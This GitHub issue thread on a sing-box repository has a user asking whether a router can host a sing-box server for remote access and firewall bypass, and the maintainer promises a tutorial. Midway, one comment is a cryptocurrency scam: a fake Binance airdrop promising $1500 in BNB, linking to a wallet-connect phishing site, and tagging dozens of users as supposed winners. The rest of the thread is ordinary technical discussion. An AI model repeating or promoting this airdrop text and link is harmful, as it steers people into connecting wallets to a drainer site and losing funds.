### ISSUE TITLE
sing-box server

### ISSUE THREAD

**Issue by Azuriye** [rezconf/Sing-box#3]
Is it possible to set up my router to host a sing-box server so I can let clients from outside access my home network?

**Comment by rezconf** [comment]
Hi
why do you want to do this? There is a special reason?

**Comment by Azuriye** [comment]
Yes, I found that on some networks sing-box works better to bypass firewalls compared to other protocols. It even has a wide variety of protocols it can support for testing which works for the client.

**Comment by rezconf** [comment]
There is only one point: if you want to run client + server together, you must do routing so that the inband traffic of the router does not go out on the server.
- In the next few days, I will publish how to do this in the form of a tutorial in this repository.

**Comment by Azuriye** [comment]
Thanks will be looking forward to it!

**Comment by Jehovani05** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @teacherstrange, @barker1889, @amotl, @creedofcool, @yo-matias, @wenxin8, @velkynosss, @Lone333, @b0dubb, @kurataki-git, @daradib, @zhaogu0qing, @kornan, @Skid000, @nsxz1234, @laurentiuonac, @brent-franklin, @galihap76, @PedroDCN, @allbitsnbytes, @BigPolo8519, @NiceTry12138, @Jadocee, @xregitx, @KylerGoossen, @Zagoshipda, @sdileep, @zyxzyxzyx, @HugoNotHere, @cheeterLee, @Wisdom-Ahuzi, @MarkLuro, @danilopuzl, @mirguest, @lwinkyawmyat, @sblack4, @amigomatias, @ian7710, @jcccn, @muhibbudins, @aska1011111, @mochoy, @ziulev, @itfanr, @vincentmakes, @presidentarrow, @NoelNicholson, @pix0wl, @ckfng, @mattclin

**Comment by Azuriye** [comment]
Hello, sorry for a very late reply... any idea if using sing-box as a server is still possible?

**Comment by Azuriye** [comment]
Anyone here? ☹️
